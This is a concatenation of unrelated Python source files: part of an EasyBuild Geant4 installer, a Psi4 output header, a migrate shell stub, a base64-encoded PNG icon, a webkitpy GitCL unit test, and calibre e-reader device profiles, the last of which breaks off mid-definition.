"standard 3D graphics library, OpenGL. It is well suited for real-time fast visualization " \
"and prototyping. The X11 version of the OpenGL libraries and the Motif Xm extension is " \
"required. [n]": "",
"G4VIS_BUILD_DAWN_DRIVER G4VIS_USE_DAWN DAWN drivers are interfaces to the Fukui Renderer " \
"DAWN. DAWN is a vectorized 3D PostScript processor suited to prepare technical high " \
"quality outputs for presentation and/or documentation. [n]": "",
"G4VIS_BUILD_OIX_DRIVER G4VIS_USE_OIX The OpenInventor driver is based on OpenInventor tech" \
"nology for scientific visualization. The X11 version of OpenInventor is required. [n]": "",
"G4VIS_BUILD_RAYTRACERX_DRIVER G4VIS_USE_RAYTRACERX Allows for interactive ray-tracing " \
"graphics through X11. The X11 package is required. [n]": "",
"G4VIS_BUILD_VRML_DRIVER G4VIS_USE_VRML These driver generate VRML files, which describe " \
"3D scenes to be visualized with a proper VRML viewer. [n]": "",
"G4LIB_BUILD_GDML Setting this variable will enable building of the GDML plugin module " \
"embedded in Geant4 for detector description persistency. It requires your system to have " \
"the XercesC library and headers installed. Do you want to set this variable? [n]": "",
"G4LIB_BUILD_G3TOG4 The utility module 'g3tog4' will be built by setting this variable. " \
"NOTE: it requires a valid FORTRAN compiler to be installed on your system and the " \
"'cernlib' command in the path, in order to build the ancillary tools! Do you want to " \
"build 'g3tog4' ? [n]": "",
"G4LIB_BUILD_ZLIB Do you want to activate compression for output files generated by the " \
"HepRep visualization driver? [n]": "y",
"G4ANALYSIS_USE Activates the configuration setup for allowing plugins to analysis tools " \
"based on AIDA (Astract Interfaces for Data Analysis). In order to use AIDA features and " \
"compliant analysis tools, the proper environment for these tools will have to be set " \
"(see documentation for the specific analysis tools). [n]": "",
"Press [Enter] to start installation or use a shell escape to edit config.sh: ": "",
# extra questions and answers for version 9.2.p03
"Directory %s doesn't exist. Use that name anyway? [n]" % dst: "y",
"Specify the path where the Geant4 data libraries PhotonEvaporation%s " \
"RadioactiveDecay%s G4EMLOW%s G4NDL%s G4ABLA%s are " \
"installed. For now, a flat directory structure is assumed, and this can be customized " \
"at the next step if needed. [%s/data]" % (self.cfg['PhotonEvaporationVersion'],
self.cfg['G4RadioactiveDecayVersion'],
self.cfg['G4EMLOWVersion'],
self.cfg['G4NDLVersion'],
self.cfg['G4ABLAVersion'],
pwd
): "%s/data" % dst,
"Please enter 1) Another path to search in 2) 'f' to force the use of the path " \
"you entered previously (the data libraries are not needed to build Geant4, but " \
"are needed to run applications later). 3) 'c' to customize the data paths, e.g. " \
"if you have the data libraries installed in different locations. [f]": "",
"G4UI_BUILD_QT_SESSION G4UI_USE_QT Setting these variables will enable the building " \
"of the G4 Qt based user interface module and the use of this module in your " \
"applications respectively. The Qt3 or Qt4 headers, libraries and moc application are " \
"required to enable the building of this module. Do you want to enable build and use of " \
"this module? [n]": "",
# extra questions and answers for version 9.4.po1
"What is the path to the Geant4 source tree? [%s]" % pwd: "",
"Where should Geant4 be installed? [%s]" % pwd: dst,
"Do you want to install all Geant4 headers in one directory? [n]": "y",
"Do you want to build shared libraries? [y]": "",
"Do you want to build static libraries too? [n]": "",
"Do you want to build global libraries? [y]": "",
"Do you want to build granular libraries as well? [n]": "",
"Do you want to build libraries with debugging information? [n]": "",
"Specify the path where the Geant4 data libraries are installed: [%s/data]" % pwd: "%s/data" % dst,
"How many parallel jobs should make launch? [1]": "%s" % self.cfg['parallel'],
"Please enter 1) Another path to search in 2) 'f' to force the use of the path you entered " \
"previously (the data libraries are NOT needed to build Geant4, but are needed to run " \
"applications later). 3) 'c' to customize the data paths, e.g. if you have the data " \
"libraries installed in different locations. [f]": "",
"Enable building of User Interface (UI) modules? [y]": "",
"Enable building of the XAW (X11 Athena Widget set) UI module? [n]": "",
"Enable building of the X11-Motif (Xm) UI module? [n]": "",
"Enable building of the Qt UI module? [n]": "",
"Enable building of visualization drivers? [y]": "n",
"Enable the Geometry Description Markup Language (GDML) module? [n]": "",
"Enable build of the g3tog4 utility module? [n]": "",
"Enable internal zlib compression for HepRep visualization? [n] ": "",
}
self.noqanda = [r"Compiling\s+.*?\s+\.\.\.",
r"Making\s+dependency\s+for\s+file\s+.*?\s+\.\.\.",
r"Making\s+libname\.map\s+starter\s+file\s+\.\.\.",
r"Making\s+libname\.map\s+\.\.\.",
r"Reading\s+library\s+get_name\s+map\s+file\s*\.\.\.",
r"Reading\s+dependency\s+files\s*\.\.\.",
r"Creating\s+shared\s+library\s+.*?\s+\.\.\."
]
run_cmd_qa(cmd, self.qanda, self.noqanda, log_all=True, simple=True)
# determining self.g4system
try:
scriptdirbase = os.path.join(pwd, '.config', 'bin')
filelist = os.listdir(scriptdirbase)
except OSError, err:
self.log.error("Failed to determine self.g4system: %s" % err)
if len(filelist) != 1:
self.log.error("Exactly one directory is expected in %s; found back: %s" % (scriptdirbase, filelist))
else:
self.g4system = filelist[0]
self.scriptdir = os.path.join(scriptdirbase, self.g4system)
if not os.path.isdir(self.scriptdir):
self.log.error("Something went wrong. Dir: %s doesn't exist." % self.scriptdir)
self.log.info("The directory containing several important scripts to be copied was found: %s" % self.scriptdir)
# copying config.sh to pwd
try:
self.log.info("copying config.sh to %s" % pwd)
shutil.copy2(os.path.join(self.scriptdir, 'config.sh'), pwd)
except IOError, err:
self.log.error("Failed to copy config.sh to %s" % pwd)
# creating several scripts containing environment variables
cmd = "%s/Configure -S -f config.sh -D g4conf=%s -D abssrc=%s" % (pwd, self.scriptdir, pwd)
run_cmd(cmd, log_all=True, simple=True)
def build_step(self):
"""Build Geant4."""
if LooseVersion(self.version) >= LooseVersion("9.5"):
super(EB_Geant4, self).build_step()
else:
pwd = self.cfg['start_dir']
cmd = "%s/Configure -build" % pwd
run_cmd_qa(cmd, self.qanda, no_qa=self.noqanda, log_all=True, simple=True)
def install_step(self):
"""Install Geant4."""
if LooseVersion(self.version) >= LooseVersion("9.5"):
super(EB_Geant4, self).install_step()
self.datadst = os.path.join(self.installdir,
'share',
'%s-%s' % (self.name, self.version.replace("p0", "")),
'data',
)
else:
pwd = self.cfg['start_dir']
try:
datasrc = os.path.join(pwd, '..')
self.datadst = os.path.join(self.installdir, 'data')
os.mkdir(self.datadst)
except OSError, err:
self.log.error("Failed to create data destination file %s: %s" % (self.datadst, err))
datalist = ['G4ABLA%s' % self.cfg['G4ABLAVersion'],
'G4EMLOW%s' % self.cfg['G4EMLOWVersion'],
'G4NDL%s' % self.cfg['G4NDLVersion'],
'PhotonEvaporation%s' % self.cfg['PhotonEvaporationVersion'],
'RadioactiveDecay%s' % self.cfg['G4RadioactiveDecayVersion'],
]
try:
for dat in datalist:
self.log.info("Copying %s to %s" % (dat, self.datadst))
shutil.copytree(os.path.join(datasrc, dat), os.path.join(self.datadst, dat))
except IOError, err:
self.log.error("Something went wrong during data copying (%s) to %s: %s" % (dat, self.datadst, err))
try:
for fil in ['config', 'environments', 'examples']:
self.log.info("Copying %s to %s" % (fil, self.installdir))
if not os.path.exists(os.path.join(pwd, fil)):
self.log.error("No such file or directory: %s" % fil)
if os.path.isdir(os.path.join(pwd, fil)):
shutil.copytree(os.path.join(pwd, fil), os.path.join(self.installdir, fil))
elif os.path.isfile(os.path.join(pwd, fil)):
shutil.copy2(os.path.join(pwd, fil), os.path.join(self.installdir, fil))
except IOError, err:
self.log.error("Something went wrong during copying of %s to %s: %s" % (fil, self.installdir, err))
try:
for fil in ['config.sh', 'env.sh', 'env.csh']:
self.log.info("Copying %s to %s" % (fil, self.installdir))
if not os.path.exists(os.path.join(self.scriptdir, fil)):
self.log.error("No such file or directory: %s" % fil)
if os.path.isdir(os.path.join(self.scriptdir, fil)):
shutil.copytree(os.path.join(self.scriptdir, fil), os.path.join(self.installdir, fil))
elif os.path.isfile(os.path.join(self.scriptdir, fil)):
shutil.copy2(os.path.join(self.scriptdir, fil), os.path.join(self.installdir, fil))
except IOError, err:
self.log.error("Something went wrong during copying of (%s) to %s: %s" % (fil, self.installdir, err))
cmd = "%(pwd)s/Configure -f %(pwd)s/config.sh -d -install" % {'pwd': pwd}
run_cmd(cmd, log_all=True, simple=True)
mpiuidir = os.path.join(self.installdir, "examples/extended/parallel/MPI/mpi_interface")
os.chdir(mpiuidir)
# tweak config file as needed
f = open("G4MPI.gmk", "r")
G4MPItxt = f.read()
f.close()
root_re = re.compile("(.*G4MPIROOT\s+=\s+).*", re.MULTILINE)
cxx_re = re.compile("(.*CXX\s+:=\s+).*", re.MULTILINE)
cppflags_re = re.compile("(.*CPPFLAGS\s+\+=\s+.*)", re.MULTILINE)
G4MPItxt = root_re.sub(r"\1%s/intel64" % get_software_root('IMPI'), G4MPItxt)
G4MPItxt = cxx_re.sub(r"\1mpicxx -cxx=icpc", G4MPItxt)
G4MPItxt = cppflags_re.sub(r"\1 -I$(G4INCLUDE) -I%s)/include" % get_software_root('CLHEP'), G4MPItxt)
self.log.debug("contents of G4MPI.gmk: %s" % G4MPItxt)
shutil.copyfile("G4MPI.gmk", "G4MPI.gmk.ORIG")
f = open("G4MPI.gmk", "w")
f.write(G4MPItxt)
f.close()
# make sure the required environment variables are there
env.setvar("G4INSTALL", self.installdir)
env.setvar("G4SYSTEM", self.g4system)
env.setvar("G4LIB", "%s/lib/geant4/" % self.installdir)
env.setvar("G4INCLUDE", "%s/include/geant4/" % self.installdir)
run_cmd("make", log_all=True, simple=True)
run_cmd("make includes", log_all=True, simple=True)
def make_module_extra(self):
"""Define Geant4-specific environment variables in module file."""
g4version = '.'.join(self.version.split('.')[:2])
txt = super(EB_Geant4, self).make_module_extra()
txt += self.moduleGenerator.set_environment('G4INSTALL', "$root")
#no longer needed in > 9.5, but leave it there for now.
txt += self.moduleGenerator.set_environment('G4VERSION', g4version)
if LooseVersion(self.version) >= LooseVersion("9.5"):
txt += self.moduleGenerator.set_environment('G4INCLUDE', "$root/include/Geant4")
txt += self.moduleGenerator.set_environment('G4LIB', "$root/lib64/Geant4")
else:
txt += self.moduleGenerator.set_environment('G4INCLUDE', "$root/include/geant4")
txt += self.moduleGenerator.set_environment('G4LIB', "$root/lib/geant4")
txt += self.moduleGenerator.set_environment('G4SYSTEM', self.g4system)
txt += self.moduleGenerator.set_environment('G4ABLADATA',
"%s/G4ABLA%s" % (self.datadst, self.cfg['G4ABLAVersion']))
txt += self.moduleGenerator.set_environment('G4LEVELGAMMADATA',
"%s/PhotonEvaporation%s" % (self.datadst,
self.cfg['PhotonEvaporationVersion']))
txt += self.moduleGenerator.set_environment('G4RADIOACTIVEDATA',
"%s/RadioactiveDecay%s" % (self.datadst,
self.cfg['G4RadioactiveDecayVersion']))
txt += self.moduleGenerator.set_environment('G4LEDATA',
"%s/G4EMLOW%s" % (self.datadst, self.cfg['G4EMLOWVersion']))
txt += self.moduleGenerator.set_environment('G4NEUTRONHPDATA', "%s/G4NDL%s" % (self.datadst,
self.cfg['G4NDLVersion']))
return txt
def sanity_check_step(self):
"""
Custom sanity check for Geant4 >= 9.5
Not tested with previous versions
"""
custom_paths = {
'files': ["bin/geant4%s" % x for x in [".sh", ".csh", "-config"]] +
["lib64/libG4%s.so" % x for x in ['analysis', 'event', 'GMocren', 'materials',
'persistency', 'readout', 'Tree', 'VRML']],
'dirs': ['include/Geant4'],
}
super(EB_Geant4, self).sanity_check_step(custom_paths)
|
import datetime
import os
from . import core
from .metadata import __version__, version_formatter
time_string = datetime.datetime.now().strftime('%A, %d %B %Y %I:%M%p')
pid = os.getpid()
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def print_header():
driver_info = version_formatter("""{version} {release}""")
git_info = version_formatter("""{{{branch}}} {githash} {clean}""")
datadir = core.get_environment("PSIDATADIR")
memory = sizeof_fmt(core.get_memory())
threads = str(core.get_num_threads())
header = """
-----------------------------------------------------------------------
Psi4: An Open-Source Ab Initio Electronic Structure Package
Psi4 %s
Git: Rev %s
R. M. Parrish, L. A. Burns, D. G. A. Smith, A. C. Simmonett,
A. E. DePrince III, E. G. Hohenstein, U. Bozkaya, A. Yu. Sokolov,
R. Di Remigio, R. M. Richard, J. F. Gonthier, A. M. James,
H. R. McAlexander, A. Kumar, M. Saitow, X. Wang, B. P. Pritchard,
P. Verma, H. F. Schaefer III, K. Patkowski, R. A. King, E. F. Valeev,
F. A. Evangelista, J. M. Turney, T. D. Crawford, and C. D. Sherrill,
submitted.
-----------------------------------------------------------------------
Psi4 started on: %s
Process ID: %6d
PSIDATADIR: %s
Memory: %s
Threads: %s
""" % (driver_info, git_info, time_string, pid, datadir, memory, threads)
core.print_out(header)
|
from migrate.versioning.shell import main
if __name__ == '__main__':
main(debug='False', repository='.')
|
icon_outputs = b'iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAA'\
b'BHNCSVQICAgIfAhkiAAAAAlwSFlzAAAN1wAADdcBQiibeAAA'\
b'CuNJREFUaIHVmltsXcd1hr+Z2ftceZVoi4xFS6KdSlHkooGr'\
b'JgpyqWQEKFwkqNvaemrhINVDCxfpS4HW7YP8UD+5ShEbiuJL'\
b'0LhGW0Bx/ZDGdYwiiA2bVS624jqOqBspUbLEm07Ec9vXWdOH'\
b'fXgkUhR5KJkPXcAAm+SamfXPWutfa8+mYhX57ksvTez6xCe2'\
b'Gt+jq9xFIZ/H8zy01hhjaDabvPXWW+zbtw+tNSJCkqaEYUi9'\
b'XqNarXH6zJnxr331q/esttetiLeawq9/Xdm6cWCAOI4xxuD5'\
b'PlopcrkcuVyORqPB5OQk5XIZAGstJk1J0pT5apVfnTjBlUpl'\
b'ZD2MB9CrKVQqFcbPnmViYoKJ8XFOjo1Rq9dwOABEhCNHjuCc'\
b'wzmHOIdYi01T0tQizq2X7UAHHujt7WPrtq3EcUIulyNJEur1'\
b'Ohs2bGjr+L7fflaLZq+v8dCBB8QJIq59ws4JWpsV5zho6QLr'\
b'7IHVAYi0jadlj9aLp8Ub77zJbNcGs16yaghdO/lrQ6nFgdLY'\
b'vuvGedz88Dc9dPjOgip+1hil6mEyOvP9A9O3ZD1r9MDCWOoB'\
b'EzSvGe5cZnkWPzekweaH/7FYcubAx4e7vrNrpP/ZjWX9xJav'\
b'HP7UrQLoyAPipM06ywHo/uDdZec5R3vegjRrVb/buG0Pfu7+'\
b'/vs+OcybPzn7tXd/OXkfX/7mM82q/v7sG4/V1wKgcw9cl8h6'\
b'SQipOF5s/DJPbamADatGa0H5Pl/Y8xveV76067MPfGbLoTs3'\
b'qX/Y/OVn7l0LgM5yQDJ+X0hGpZfH7ZY8L0TRIh17WdmwbIKg'\
b'SdAMERyDg/383t5dg73dxT8/fmJqq/8Hh5+bODX9Or96YvHJ'\
b'3CqABS8sWLM0hNpAr/2wSH+ppFFVh0FAEEbXwkwrfvu3tvob'\
b'+sq//4ux6W3lrq6R2e0v/vv0K386s5J9q4YQLITRNRBLWQgg'\
b'jmNmpqex1q5YviSdVjap6yAICIKYMIwIg5gwiEmsZXhzv/ni'\
b'79x936fv23Tw7g25x0ceevFGirtOVvUAgBW7mFiW4UfnHKVy'\
b'mUYQ8/LrP+fyzDzVepWr81XCIOTjD3z9nyQNsHGUS+Lg/iiK'\
b'iOKk7SSHa4ern/P4ze0b+3tK3l+cmLj6KW//dw+dmr/jNV57'\
b'MLolACLSYsQWE4ncoFMoFMgXCpw4fZE33znN5uEhujYOUto4'\
b'hHOOLTvk6yIWsYITy+DQx4jj9DoAZF4WyfJNhM2DJd/3+EJ3'\
b'ybvLG6/srj78z9+6ePTRD9cMwFqL1jpjIlixQXNOEBHK3SVy'\
b'+QKe52N8D6M9jDEordFaoxQkseAU7ZxZaFXEZmuICN1lzY4t'\
b'pRHl7F9fqoTbcg9/54XxmfNv8sYTaecesAKoRR3oTQHgCMOI'\
b'ZjPCYRAB48AYhRHQBrQGpTQKAbVQ96RF1RkAay1WLNam2NSq'\
b'uwf9XLngHskpu924Lc8FDz939OLRA5UOc0BQWrcZQ8TeXNlB'\
b'GEU0myFK+4hoPDF4vuCcRjvXAtAiA7cQ/7RaccnacWtJbYqz'\
b'ljRNiOMIlTY9L67c74Jwq9HFe+7+wxeOdJwDGQvJTZM4Mz7L'\
b'8jAIqTdCtJfH4eGU4LQDBaalpvS1Oe33CHHYNDv9KIwJg4hm'\
b'EFCvN5ifrzJ35SqNep1mEG4UU/5Lv2dwW8c5YDzTrk4rhpA4'\
b'qtUa5yen2TAg9PQIpbIjX4BcDjzPobXAwuk7hxUhTYU0scRJ'\
b'QhjGBEFAFEUEzWb2HAYkqSAOcAKS+qRxV8cAsgR2CCsDAAjD'\
b'iLkrNVKXJ4g05QCKJSgUHJ5n8VrJrFSWV04yEGItSSokFsRp'\
b'HAqlNcYsJL4CpZ3yyxXtd79skc5CKKsDGbWtFEJZNXY4ScG5'\
b'bHPPYHwfz/fxPB/f9/A80zZoodIbEVKlsjwTh/UM2hq0NqhW'\
b'vCXWprFVp1LtH7GR/t7cf//t5VUB2DQliWNMuYtavYHYlOHh'\
b'YbTSy7YUOEFsgnVZomtt8IyH7xn8nEfO9zMAKgOw8Ma3UMFF'\
b'BCuZ4ZmOxlpLtVazjUbzB5G13557+9LrcNRCBzRqPA9rhTAM'\
b'6evrpau7m2Kx2ObpZRCglKVZvcK8Udi4SbN2hUI+R84zeEZj'\
b'jOKurdvp7t3QMljQrdMXIxgrmNbhNOpVNzN96VK1Ov9vYZR8'\
b'u3r8hTPX79ZRCDmxxHGMtNy7kgxs7OOhL32Gk2cnCaKAMJwn'\
b'asR8cH72ZSQFiY3YZPeDf3zgrg0DmxARtLXgwEhmuNaKNI25'\
b'NDkuM1Mf/rRarT1zdebKK1z+z+bS/TqjUSBXyEO7obv5fcPG'\
b'vh7+6sAfMTc3x8S5CSYvXKDeaHDwh//yCADdO/pzxdxhrfUj'\
b'uZyPtRalaAFROKAyN8X5MyevXLgw8UoQREeaY0ePt8y4QTpm'\
b'IVo8LU5WvGhY9M6gVLt1aBug8xatref75Hy/lbgOrS1pEnP+'\
b'zPv2zNj747NTlw/HNj0anP7BhzffbQ0AFqrwzUJobm4u43Rr'\
b'aTab1Gs1mvUGjUY22qI9h3LWmIyNRASlFLX5Cu+/M5qc+OXP'\
b'X6vNX30+OCevwhvparZ1XInlul5lORkYGEBECIKAsZMn6evv'\
b'p1AsUCwWl6Nd8TyDMQZrA86OvefePfbjS+fGT/5rHNSejy/9'\
b'7FQndnUMIEnSa53iKuHz7LPPEscxs3NzfHHv797IVMo4EAmC'\
b'kLmZKX729o/kg/eO/c/Uh+e/lVyeeRnOh50a3zGA1KaL7j2d'\
b'ZP1KmqakNuP7NE2xIpRKJQC6u7qWL3jKc07Z+uiPf+h++vaP'\
b'Khcnz7waBbVvplPHjwMrdIm3AUCsJQpCnHOEYciFC5MMbhpk'\
b'5J57SJOE4TBsg9m/fz8nxsbIFwpcuDB5I4gro00Z/PSrk+On'\
b'Upz93yRJXqfy3oqJelsAlFIkSUI+n0dpTblUZnjzMIVCnjiO'\
b'SZKETzYaxEnS/jYwODREpVJBxKFQSyu2tVM/+S8Lr/ER3P6u'\
b'CkBrTZIkWLFEQZNCvkAcx1kz6bLQaXz+88RRlHWVSUIUhsRx'\
b'jBWL0mrZS4CPwviOABitCaOYixcv0tvXl3WMSYzWClD09vXx'\
b'99/4RhZCaUocx9nXmUaDOIpxIhiz8m32egLIO+emjVabrAjO'\
b'SqtHD7CpxZgI43nQ4v+09WUmCAKSNMXh8DyfJI6m1gvAsr5d'\
b'It3Xja7WKG3btu1ze/bsedzzPAYGBjh27Njp0dHRvwFCoNEa'\
b'daAK1FrjI5dOWGjZzffs2SN79+59vFAoMDIyQpIkU6Ojo//x'\
b'0Zu4snREo8tJsVhM+/v7KRQK3HHHHRSLxVXL/nrILQPwfd/2'\
b'9/dTLBYZGBigXC7//wJQLpfT/v5+fN+nVCqhtV7/L3rLSCdJ'\
b'zKFDh+5VSr0D9LR/qX2czoPOgUvBRigXL/quNDQ0dG7//v0j'\
b'Sql1A6ceffTRP/F9/2MrKe3cufPeffv2/dlaF+/q6uKpp576'\
b'uzRNl+1xlFJqYGDg4pNPPvnSWtdur3H8+PFzpVJpy0pK1Wr1'\
b'lhbv6elZVadarZ7cvXv3jlvagA5ywFpLvV6nXl/Tpysge4/o'\
b'6+tbVed2xBsaGmr/n8NSSZKEq1ev4nkeU1NrL6b5fJ4dO3Ys'\
b'f/3SEpFVbglWEe/w4cMv5nK5TUv/EEWRFwRBDkBrPdTd3f3A'\
b'Whfv7e3l6aeffp6bvJC31r6tNqMjFnrsscd2OOd+AeTXsvjO'\
b'nTtnZ2dnBw8ePHh7cbKC/B8rHMqx5Ahr7gAAAABJRU5ErkJg'\
b'gg=='
|
import unittest
from webkitpy.common.net.git_cl import GitCL
from webkitpy.common.system.executive_mock import MockExecutive2
from webkitpy.common.host_mock import MockHost
class GitCLTest(unittest.TestCase):
def test_run(self):
host = MockHost()
host.executive = MockExecutive2(output='mock-output')
git_cl = GitCL(host)
output = git_cl.run(['command'])
self.assertEqual(output, 'mock-output')
self.assertEqual(host.executive.calls, [['git', 'cl', 'command']])
def test_run_with_auth(self):
host = MockHost()
host.executive = MockExecutive2(output='mock-output')
git_cl = GitCL(host, auth_refresh_token_json='token.json')
git_cl.run(['upload'])
self.assertEqual(
host.executive.calls,
[['git', 'cl', 'upload', '--auth-refresh-token-json', 'token.json']])
def test_some_commands_not_run_with_auth(self):
host = MockHost()
host.executive = MockExecutive2(output='mock-output')
git_cl = GitCL(host, auth_refresh_token_json='token.json')
git_cl.run(['issue'])
self.assertEqual(host.executive.calls, [['git', 'cl', 'issue']])
def test_get_issue_number(self):
host = MockHost()
host.executive = MockExecutive2(output='Issue number: 12345 (http://crrev.com/12345)')
git_cl = GitCL(host)
self.assertEqual(git_cl.get_issue_number(), '12345')
def test_get_issue_number_none(self):
host = MockHost()
host.executive = MockExecutive2(output='Issue number: None (None)')
git_cl = GitCL(host)
self.assertEqual(git_cl.get_issue_number(), 'None')
def test_all_jobs_finished_empty(self):
self.assertTrue(GitCL.all_jobs_finished([]))
def test_all_jobs_finished_with_started_jobs(self):
self.assertFalse(GitCL.all_jobs_finished([
{
'builder_name': 'some-builder',
'status': 'COMPLETED',
'result': 'FAILURE',
},
{
'builder_name': 'some-builder',
'status': 'STARTED',
'result': None,
},
]))
def test_all_jobs_finished_only_completed_jobs(self):
self.assertTrue(GitCL.all_jobs_finished([
{
'builder_name': 'some-builder',
'status': 'COMPLETED',
'result': 'FAILURE',
},
{
'builder_name': 'some-builder',
'status': 'COMPLETED',
'result': 'SUCCESS',
},
]))
def test_has_failing_try_results_empty(self):
self.assertFalse(GitCL.has_failing_try_results([]))
def test_has_failing_try_results_only_success_and_started(self):
self.assertFalse(GitCL.has_failing_try_results([
{
'builder_name': 'some-builder',
'status': 'COMPLETED',
'result': 'SUCCESS',
},
{
'builder_name': 'some-builder',
'status': 'STARTED',
'result': None,
},
]))
def test_has_failing_try_results_with_failing_results(self):
self.assertTrue(GitCL.has_failing_try_results([
{
'builder_name': 'some-builder',
'status': 'COMPLETED',
'result': 'FAILURE',
},
]))
|
from __future__ import with_statement
__license__ = 'GPL 3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
from itertools import izip
from calibre.customize import Plugin as _Plugin
FONT_SIZES = [('xx-small', 1),
('x-small', None),
('small', 2),
('medium', 3),
('large', 4),
('x-large', 5),
('xx-large', 6),
(None, 7)]
class Plugin(_Plugin):
fbase = 12
fsizes = [5, 7, 9, 12, 13.5, 17, 20, 22, 24]
screen_size = (1600, 1200)
dpi = 100
def __init__(self, *args, **kwargs):
_Plugin.__init__(self, *args, **kwargs)
self.width, self.height = self.screen_size
fsizes = list(self.fsizes)
self.fkey = list(self.fsizes)
self.fsizes = []
for (name, num), size in izip(FONT_SIZES, fsizes):
self.fsizes.append((name, num, float(size)))
self.fnames = dict((name, sz) for name, _, sz in self.fsizes if name)
self.fnums = dict((num, sz) for _, num, sz in self.fsizes if num)
self.width_pts = self.width * 72./self.dpi
self.height_pts = self.height * 72./self.dpi
class InputProfile(Plugin):
author = 'Kovid Goyal'
supported_platforms = set(['windows', 'osx', 'linux'])
can_be_disabled = False
type = _('Input profile')
name = 'Default Input Profile'
short_name = 'default' # Used in the CLI so dont use spaces etc. in it
description = _('This profile tries to provide sane defaults and is useful '
'if you know nothing about the input document.')
class SonyReaderInput(InputProfile):
name = 'Sony Reader'
short_name = 'sony'
description = _('This profile is intended for the SONY PRS line. '
'The 500/505/600/700 etc.')
screen_size = (584, 754)
dpi = 168.451
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class SonyReader300Input(SonyReaderInput):
name = 'Sony Reader 300'
short_name = 'sony300'
description = _('This profile is intended for the SONY PRS 300.')
dpi = 200
class SonyReader900Input(SonyReaderInput):
author = 'John Schember'
name = 'Sony Reader 900'
short_name = 'sony900'
description = _('This profile is intended for the SONY PRS-900.')
screen_size = (584, 978)
class MSReaderInput(InputProfile):
name = 'Microsoft Reader'
short_name = 'msreader'
description = _('This profile is intended for the Microsoft Reader.')
screen_size = (480, 652)
dpi = 96
fbase = 13
fsizes = [10, 11, 13, 16, 18, 20, 22, 26]
class MobipocketInput(InputProfile):
name = 'Mobipocket Books'
short_name = 'mobipocket'
description = _('This profile is intended for the Mobipocket books.')
# Unfortunately MOBI books are not narrowly targeted, so this information is
# quite likely to be spurious
screen_size = (600, 800)
dpi = 96
fbase = 18
fsizes = [14, 14, 16, 18, 20, 22, 24, 26]
class HanlinV3Input(InputProfile):
name = 'Hanlin V3'
short_name = 'hanlinv3'
description = _('This profile is intended for the Hanlin V3 and its clones.')
# Screen size is a best guess
screen_size = (584, 754)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class HanlinV5Input(HanlinV3Input):
name = 'Hanlin V5'
short_name = 'hanlinv5'
description = _('This profile is intended for the Hanlin V5 and its clones.')
# Screen size is a best guess
screen_size = (584, 754)
dpi = 200
class CybookG3Input(InputProfile):
name = 'Cybook G3'
short_name = 'cybookg3'
description = _('This profile is intended for the Cybook G3.')
# Screen size is a best guess
screen_size = (600, 800)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class CybookOpusInput(InputProfile):
author = 'John Schember'
name = 'Cybook Opus'
short_name = 'cybook_opus'
description = _('This profile is intended for the Cybook Opus.')
# Screen size is a best guess
screen_size = (600, 800)
dpi = 200
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class KindleInput(InputProfile):
name = 'Kindle'
short_name = 'kindle'
description = _('This profile is intended for the Amazon Kindle.')
# Screen size is a best guess
screen_size = (525, 640)
dpi = 168.451
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
class IlliadInput(InputProfile):
name = 'Illiad'
short_name = 'illiad'
description = _('This profile is intended for the Irex Illiad.')
screen_size = (760, 925)
dpi = 160.0
fbase = 12
fsizes = [7.5, 9, 10, 12, 15.5, 20, 22, 24]
class IRexDR1000Input(InputProfile):
author = 'John Schember'
name = 'IRex Digital Reader 1000'
short_name = 'irexdr1000'
description = _('This profile is intended for the IRex Digital Reader 1000.')
# Screen size is a best guess
screen_size = (1024, 1280)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class IRexDR800Input(InputProfile):
author = 'Eric Cronin'
name = 'IRex Digital Reader 800'
short_name = 'irexdr800'
description = _('This profile is intended for the IRex Digital Reader 800.')
screen_size = (768, 1024)
dpi = 160
fbase = 16
fsizes = [12, 14, 16, 18, 20, 22, 24]
class NookInput(InputProfile):
author = 'John Schember'
name = 'Nook'
short_name = 'nook'
description = _('This profile is intended for the B&N Nook.')
# Screen size is a best guess
screen_size = (600, 800)
dpi = 167
fbase = 16
fsizes = [12, 12, 14, 16, 18, 20, 22, 24]
input_profiles = [InputProfile, SonyReaderInput, SonyReader300Input,
SonyReader900Input, MSReaderInput, MobipocketInput, HanlinV3Input,
HanlinV5Input, CybookG3Input, CybookOpusInput, KindleInput, IlliadInput,
IRexDR1000Input, IRexDR800Input, NookInput]
input_profiles.sort(cmp=lambda x,y:cmp(x.name.lower(), y.name.lower()))
class OutputProfile(Plugin):
author = 'Kovid Goyal'
supported_platforms = set(['windows', 'osx', 'linux'])
can_be_disabled = False
type = _('Output profile')
name = 'Default Output Profile'
short_name = 'default' # Used in the CLI so dont use spaces etc. in it
description = _('This profile tries to provide sane defaults and is useful '
'if you want to produce a document intended to be read at a '
'computer or on a range of devices.')
#: The image size for comics
comic_screen_size = (584, 754)
#: If True the MOBI renderer on the device supports MOBI indexing
supports_mobi_indexing = False
#: If True output should be optimized for a touchscreen interface
touchscreen = False
touchscreen_news_css = ''
#: A list of extra (beyond CSS 2.1) modules supported by the device
#: Format is a cssutils profile dictionary (see iPad for example)
extra_css_modules = []
#: If True, the date is appended to the title of downloaded news
periodical_date_in_title = True
#: Characters used in jackets and catalogs
ratings_char = u'*'
empty_ratings_char = u' '
#: Unsupported unicode characters to be replaced during preprocessing
unsupported_unicode_chars = []
#: Number of ems that the left margin of a blockquote is rendered as
mobi_ems_per_blockquote = 1.0
#: Special periodical formatting needed in EPUB
epub_periodical_format = None
class iPadOutput(OutputProfile):
name = 'iPad'
short_name = 'ipad'
description = _('Intended for the iPad and similar devices with a '
'resolution of 768x1024')
screen_size = (768, 1024)
comic_screen_size = (768, 1024)
dpi = 132.0
extra_css_modules = [
{
'name':'webkit',
'props': {'-webkit-border-bottom-left-radius':'{length}',
'-webkit-border-bottom-right-radius':'{length}',
